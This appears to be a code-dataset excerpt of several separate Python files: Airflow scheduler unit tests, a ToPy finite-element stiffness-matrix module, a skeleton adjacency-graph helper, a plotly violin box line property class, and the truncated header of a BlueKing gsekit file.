scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_called()
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='[email protected]',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, ti) = ti_tuple
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# now the executor has cleared and it should be allowed the re-queue
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.QUEUED)
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id==dag.dag_id,
TI.task_id==dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_scheduler_run_duration(self):
"""
Verifies that the scheduler run duration limit is followed.
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
expected_run_duration = 5
start_time = timezone.utcnow()
scheduler = SchedulerJob(dag_id,
run_duration=expected_run_duration)
scheduler.run()
end_time = timezone.utcnow()
run_duration = (end_time - start_time).total_seconds()
logging.info("Test ran in %.2fs, expected %.2fs",
run_duration,
expected_run_duration)
self.assertLess(run_duration - expected_run_duration, 5.0)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
three_minutes_ago = now - datetime.timedelta(minutes=3)
two_hours_and_three_minutes_ago = three_minutes_ago - datetime.timedelta(hours=2)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'no_catchup_test1'
DAG_NAME2 = 'no_catchup_test2'
DAG_NAME3 = 'no_catchup_test3'
DAG_NAME4 = 'no_catchup_test4'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
default_catchup = configuration.getboolean('scheduler', 'catchup_by_default')
# Test configs have catchup by default ON
self.assertEqual(default_catchup, True)
# Correct default?
self.assertEqual(dag1.catchup, True)
dag2 = DAG(DAG_NAME2,
schedule_interval='* * * * *',
max_active_runs=1,
catchup=False,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag2)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag2)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag2)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag2.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag2.clear()
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 3 minutes, not 6 hours ago
self.assertGreater(dr.execution_date, three_minutes_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = DAG(DAG_NAME3,
schedule_interval='@hourly',
max_active_runs=1,
catchup=False,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag3)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag3)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag3)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag3.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag3.clear()
dr = None
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last two hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_and_three_minutes_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
# check @once schedule
dag4 = DAG(DAG_NAME4,
schedule_interval='@once',
max_active_runs=1,
catchup=False,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag4)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag4)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag4)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag4.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag4.clear()
dr = None
dr = scheduler.create_dag_run(dag4)
# We had better get a dag run
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = []
expected_files = []
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['no_dags.py']:
expected_files.append(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER):
detected_files.append(file_path)
self.assertEqual(sorted(detected_files), sorted(expected_files))
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEquals(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEquals(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEquals(State.SCHEDULED, ti1.state)
self.assertEquals(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEquals(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEquals(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
py | 7df7ece84a9e809f17b67115d733660bd86a1622 | def foo(b):
pass |
py | 7df7eec0a88420701d7ae7522145f02ea838413a | """
# =============================================================================
# Finite element stiffness matrices.
#
# To define your own finite elements, see Python scripts in 'data' directory.
#
# Author: William Hunter
# Copyright (C) 2008, 2015, William Hunter.
# =============================================================================
"""
from os import path
from numpy import array, linspace, unique, sqrt, round, load
from numpy.linalg import eigvalsh
from .utils import get_logger
from .data.matlcons import _a, _nu, _E
logger = get_logger(__name__)
__all__ = ['Q4', 'Q5B', 'Q4a5B', 'Q4T',\
'H8', 'H18B', 'H8T']
# ===================================================
# === Messages used for errors, information, etc. ===
# ===================================================
MSG0 = 'finite element stiffness matrix.'
MSG1 = 'Element stiffness matrices does not exist.\n Created... Please re-run \
your last attempt.'
# Set path to data folder:
pth = path.join(path.split(__file__)[0], 'data')
# 2D elements
# #############################################################################
# ==============================================
# === KBar of Q4, see De Klerk and Groenwold ===
# ==============================================
fname = path.join(pth, 'Q4bar.K')
try:
Q4bar = load(fname)
except IOError:
logger.info('It seems as though all or some of the element stiffness matrices')
logger.info('do not exist. Creating them...')
logger.info('This is usually only required once and may take a few minutes.')
from topy.data import Q4bar_K
Q4bar = load(fname)
# ==========================================================================
# === Stiffness matrix of a square 4 node plane stress bi-linear element ===
# ==========================================================================
fname = path.join(pth, 'Q4.K')
try:
Q4 = load(fname)
except IOError:
from topy.data import Q4_K
Q4 = load(fname)
# =========================================================================
# === Stiffness matrix of a square 4 node plane stress '5-beta' element ===
# =========================================================================
fname = path.join(pth, 'Q5B.K')
try:
Q5B = load(fname)
except IOError:
from topy.data import Q5B_K
Q5B = load(fname)
# =========================================================
# === Matrix for an element used in 2D thermal problems ===
# =========================================================
fname = path.join(pth, 'Q4T.K')
try:
Q4T = load(fname)
except IOError:
from topy.data import Q4T_K
Q4T = load(fname)
# ===========================================================
# === Stiffness matrix of a square 4 node 'Q4a5B' element ===
# ===========================================================
# This element is based on the '5-beta' assumed stress element for plane
# stress, but elemental parameters are introduced and selected such that
# spurious zero energy modes are not introduced, for which an investigation
# of characteristic equations of the elemental stiffness matrix is needed.
# Element thickness set = 1. See De Klerk and Groenwold for details.
# Symbolic value of alpha_opt for bending:
alpha2D = (2 * _a**2 * (1 - _nu) * (2 * _nu**2 - _nu + 1)) \
/ (3 * (_nu + 1) * _E**2)
Q4a5B = Q4 - alpha2D * _E * Q4bar # stiffness matrix
# 3D elements
# #############################################################################
# ======================================================================
# === Stiffness matrix for a hexahedron 8 node tri-linear 3D element ===
# ======================================================================
fname = path.join(pth, 'H8.K')
try:
H8 = load(fname)
except IOError:
from topy.data import H8_K
H8 = load(fname)
# ============================================================
# === Stiffness matrix of a cubic 8 node '18-beta' element ===
# ============================================================
fname = path.join(pth, 'H18B.K')
try:
H18B = load(fname)
except IOError:
from topy.data import H18B_K
H18B = load(fname)
# ==========================================================================
# === Stiffness matrix for a hexahedron 8 node tri-linear 3D element for ===
# === thermal problems. ===
# ==========================================================================
fname = path.join(pth, 'H8T.K')
try:
H8T = load(fname)
except IOError:
from topy.data import H8T_K
H8T = load(fname)
# EOF elements.py
|
py | 7df7ef3022a9d9bbe5019ad5f14c3061d2fa9243 | import sys
from . import tools
sys.path.insert(0, '')
sys.path.extend(['../'])
num_node = 15
self_link = [(i, i) for i in range(num_node)]
inward_ori_index = [(1, 2), (2, 4), (2, 7), (2, 3), (5, 4), (6, 5),
(8, 7), (9, 8), (13, 3), (13, 14), (14, 15), (3, 10),
(10, 11), (11, 12)]
inward = [(i - 1, j - 1) for (i, j) in inward_ori_index]
outward = [(j, i) for (i, j) in inward]
neighbor = inward + outward
class AdjMatrixGraph:
def __init__(self, *args, **kwargs):
self.edges = neighbor
self.num_nodes = num_node
self.self_loops = [(i, i) for i in range(self.num_nodes)]
self.inward = inward
self.outward = outward
self.neighbor = neighbor
self.A_binary = tools.get_adjacency_matrix(self.edges, self.num_nodes)
self.A_binary_with_I = tools.get_adjacency_matrix(self.edges + self.self_loops, self.num_nodes)
self.A = tools.normalize_adjacency_matrix(self.A_binary)
self.A_with_I = tools.normalize_adjacency_matrix(self.A_binary_with_I)
self.Spatial_A = tools.get_spatial_graph(num_node, self_link, inward, outward)
if __name__ == '__main__':
import matplotlib.pyplot as plt
graph = AdjMatrixGraph()
A, A_binary, A_binary_with_I, spaA = graph.A, graph.A_binary, graph.A_binary_with_I, graph.Spatial_A
f, ax = plt.subplots(1, 3)
ax[0].imshow(A_binary_with_I, cmap='gray')
ax[1].imshow(A_binary, cmap='gray')
ax[2].imshow(A, cmap='gray')
plt.show()
print(A_binary_with_I)
for i in spaA:
plt.imshow(i, cmap='gray')
plt.show()
print(spaA.shape)
|
py | 7df7f09d850728c8d08f97ee2c08c7db5daf63e1 | from .primes import * # noqa
|
py | 7df7f1863f31daadeedc5f069717f386a5dadd4d | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Line(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "violin.box"
_path_str = "violin.box.line"
_valid_props = {"color", "width"}
# color
# -----
@property
def color(self):
"""
Sets the inner box plot bounding line color.
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# width
# -----
@property
def width(self):
"""
Sets the inner box plot bounding line width.
The 'width' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["width"]
@width.setter
def width(self, val):
self["width"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
Sets the inner box plot bounding line color.
width
Sets the inner box plot bounding line width.
"""
def __init__(self, arg=None, color=None, width=None, **kwargs):
"""
Construct a new Line object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`new_plotly.graph_objs.violin.box.Line`
color
Sets the inner box plot bounding line color.
width
Sets the inner box plot bounding line width.
Returns
-------
Line
"""
super(Line, self).__init__("line")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the new_plotly.graph_objs.violin.box.Line
constructor must be a dict or
an instance of :class:`new_plotly.graph_objs.violin.box.Line`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
_v = color if color is not None else _v
if _v is not None:
self["color"] = _v
_v = arg.pop("width", None)
_v = width if width is not None else _v
if _v is not None:
self["width"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
|
py | 7df7f46cc5230371745f8da672dbf40452ee05c2 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸 (Blueking) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at https://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
"""
from typing import List, Tuple, Union
from django.utils.translation import ugettext_lazy as _
from common.log import logger
from apps.gsekit.utils.expression_utils.range2re import range2re
